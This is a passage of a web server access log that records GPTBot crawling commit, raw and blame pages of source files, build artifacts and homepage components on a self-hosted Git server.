AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13699] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10191] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10192] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21633] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13648] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15364] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21679] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fdist%2fPostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 19806] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:15:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fGoldMonitor.pkg" [Client 74.7.227.38] [Length 20824] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:15:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 31393] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:15:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 10940] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" +[17/Feb/2026:15:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14211] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" +[17/Feb/2026:15:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" +[17/Feb/2026:15:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15563] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14668] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" +[17/Feb/2026:15:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13913] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" +[17/Feb/2026:15:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" +[17/Feb/2026:15:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" +[17/Feb/2026:15:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" +[17/Feb/2026:15:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" +[17/Feb/2026:15:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:15:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 14350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:15:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 18213] [Gzip 14.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:15:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14831] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" +[17/Feb/2026:15:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" +[17/Feb/2026:15:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15528] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" +[17/Feb/2026:15:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" +[17/Feb/2026:15:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15560] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" +[17/Feb/2026:15:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14668] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" +[17/Feb/2026:15:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 